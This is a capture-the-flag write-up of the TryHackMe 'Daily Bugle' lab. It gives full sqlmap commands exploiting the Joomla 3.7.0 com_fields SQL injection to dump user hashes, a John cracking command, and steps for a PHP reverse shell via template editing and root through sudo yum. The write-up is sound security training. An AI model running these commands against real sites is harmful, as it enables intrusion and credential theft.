TryHackMe Daily Bugle

Posted on | In
DailyBugle writeup

Summary

Daily Bugle is free box on Tryhackme OSCP learning path. Compromise a Joomla CMS account via SQLi, practise cracking hashes and escalate your privileges by taking advantage of yum. categories:

Enumeration/Reconnaissance

Here is nmap result, we got three service running. PORT Service 22/tcp ssh 80/tcp http(Apache) 3306/tcp mysql(MariaDB)

lets start with port 80 to deep dive.

And we found who rob the Bank

To check for intresting directory lets fire up GoBuster.

After checking directory we got admin panel.

To get more info on joomla, i have used joomscan

Here nothing seems to be new but we got the joomla version Joomla 3.7.0

Searchsploit shows that joomla version 3.7.0 is vulnerable to sql injection.

Exploit

Here is that sqlmap command vulnerable to joomla 3.7.0

1
sqlmap -u “http://10.10.176.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

Lets start Sqlmap with above command. Here, we have declared cookies. So continue with Yes. To skip test payloads specifice for other database. So continue with Y. We got our vulnearable parameter. so stop testing with N. We got five Vulnerable database. Joomla looks interesting!!!

1
sqlmap -u “http://10.10.176.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomla --tables


1
sqlmap -u “http://10.10.176.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomla -T "#__users" --columns

Now lets check the columns of Joomla. We got a table “#__users”

Lets find out the columns of table “__users”.

We got five columns.Lets check for username and password.

1
sqlmap -u “http://10.10.176.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomla -T "#__users" -c username --dump

We got the username jonah

1
sqlmap -u “http://10.10.176.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomla -T "#__users" -c password --dump

lets check the password. We got hash

Password Cracking

Time to crack the hash. Here, I have used John to crack the hash

1
$ john --wordlist=/user/share/wordlists/rockyou.txt hash.txt

We got the username and password. Lets goto admin panel and logged in.

Here, I got the template to insert the code. We can to insert reverse shell.

Reverse shell/Connection

Here I have used PentestMonkey Php Reverse-shell.

Now, start netcat to listen on port 4444

After saving the template. Click on Template Preview to get the reverse shell. We got reverse connection in netcat. We got new user. After searching, i got configuration file in /var/www/html/configuration.php So, got username and password of jjameson. lets switch to jjameson

Privilege Escalation

For privilege Escalation, it was too easy. tried to start with sudo and got it. sudo -l Now, goto GFTObin for yum Copy paste this in your shell and boom

Root

we got root access and root.txt